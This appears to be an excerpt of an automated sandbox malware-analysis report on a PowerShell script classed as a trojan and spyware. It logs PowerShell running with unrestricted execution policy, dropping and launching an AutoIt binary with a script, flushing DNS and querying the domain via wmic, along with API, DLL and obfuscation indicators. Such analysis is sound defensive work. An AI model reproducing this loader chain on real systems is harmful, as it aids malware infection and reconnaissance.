            Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@11/12@1/1
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086A6AD GetLastError,FormatMessageW,3_2_0086A6AD
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00858DE9 AdjustTokenPrivileges,CloseHandle,3_2_00858DE9
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00859399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,3_2_00859399
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086B976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,3_2_0086B976
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00864148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,3_2_00864148
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086C9DA CoInitialize,CoCreateInstance,CoUninitialize,3_2_0086C9DA
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,3_2_0086443D
            Source: C:\downloads\Autoit3.exeFile created: C:\Users\user\AppData\Roaming\HdaEKeAJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czenej3t.2ah.ps1Jump to behavior
            Source: C:\downloads\Autoit3.exeCommand line argument: 3_2_00815F8B
            Source: C:\downloads\Autoit3.exeCommand line argument: 3_2_00815F8B
            Source: C:\downloads\Autoit3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\downloads\Autoit3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: oxi.ps1Virustotal: Detection: 12%
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\downloads\Autoit3.exe "C:\downloads\Autoit3.exe" c:\\downloads\script.a3x
            Source: C:\downloads\Autoit3.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\kkdbffb\cehaheb
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic ComputerSystem get domain
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\downloads\Autoit3.exe "C:\downloads\Autoit3.exe" c:\\downloads\script.a3x Jump to behavior
            Source: C:\downloads\Autoit3.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\kkdbffb\cehahebJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic ComputerSystem get domainJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: version.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: winmm.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: mpr.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: wininet.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: userenv.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: libeay32.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: ssleay32.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: libssl32.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: netutils.dllJump to behavior
            Source: C:\downloads\Autoit3.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

            Data Obfuscation

            barindex
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($base64)));Set-Clipboard -Value " ";exit;@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleV
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0087C6D9 LoadLibraryA,GetProcAddress,3_2_0087C6D9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B95BB70 push eax; iretd 0_2_00007FFD9B95BB71
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B950B31 push eax; ret 0_2_00007FFD9B950B51
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B95B4F2 push edx; retf 0_2_00007FFD9B95B4F3
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0082E93F push edi; ret 3_2_0082E941
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00868A4A push FFFFFF8Bh; iretd 3_2_00868A4C
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0082EA58 push esi; ret 3_2_0082EA5A
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00828B75 push ecx; ret 3_2_00828B88
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0082EC33 push esi; ret 3_2_0082EC35
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0082ED1C push edi; ret 3_2_0082ED1E
            Source: C:\downloads\Autoit3.exeCode function: 3_2_011D393D push 011D3969h; ret 3_2_011D3961
            Source: C:\downloads\Autoit3.exeCode function: 3_2_011D4925 push ecx; mov dword ptr [esp], eax3_2_011D4926
            Source: C:\downloads\Autoit3.exeCode function: 3_2_011D715F push 011D71D0h; ret 3_2_011D71C8
            Source: C:\downloads\Autoit3.exeCode function: 3_2_011D3975 push 011D3C21h; ret 3_2_011D3C19
            Source: C:\downloads\Autoit3.exeCode function: 3_2_011D7161 push 011D71D0h; ret 3_2_011D71C8
            Source: C:\downloads\Autoit3.exeCode function: 3_2_011D3815 push 011D3841h; ret 3_2_011D3839
            Source: C:\downloads\Autoit3.exeCode function: 3_2_011D7B05 push 011D7B2Bh; ret 3_2_011D7B23
            Source: C:\downloads\Autoit3.exeCode function: 3_2_011D3BF5 push 011D3C21h; ret 3_2_011D3C19
            Source: C:\downloads\Autoit3.exeCode function: 3_2_011D3595 push 011D35E6h; ret 3_2_011D35DE
            Source: C:\downloads\Autoit3.exeCode function: 3_2_011D15F9 push eax; ret 3_2_011D1635
            Source: C:\downloads\Autoit3.exeCode function: 3_2_011D37DD push 011D3809h; ret 3_2_011D3801
            Source: C:\downloads\Autoit3.exeCode function: 3_2_011D6FE1 push 011D715Dh; ret 3_2_011D7155
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CE4360 push 03CE4389h; ret 3_2_03CE4381
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03D182B8 push 03D182E4h; ret 3_2_03D182DC
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CE62B0 push 03CE62DCh; ret 3_2_03CE62D4
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CD424C push 03CD4278h; ret 3_2_03CD4270
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CDA26C push 03CDA298h; ret 3_2_03CDA290
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CDA150 push 03CDA17Ch; ret 3_2_03CDA174
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CD4174 push 03CD41C1h; ret 3_2_03CD41B9
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CD4173 push 03CD41C1h; ret 3_2_03CD41B9
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CEA104 push 03CEA130h; ret 3_2_03CEA128
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03D180E0 push 03D1810Ch; ret 3_2_03D18104

            Persistence and Installation Behavior

            barindex
            Uses ipconfig to lookup or modify the Windows network settings
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\downloads\Autoit3.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008859B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_008859B3
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00815EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_00815EDA
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008233B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_008233B7
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
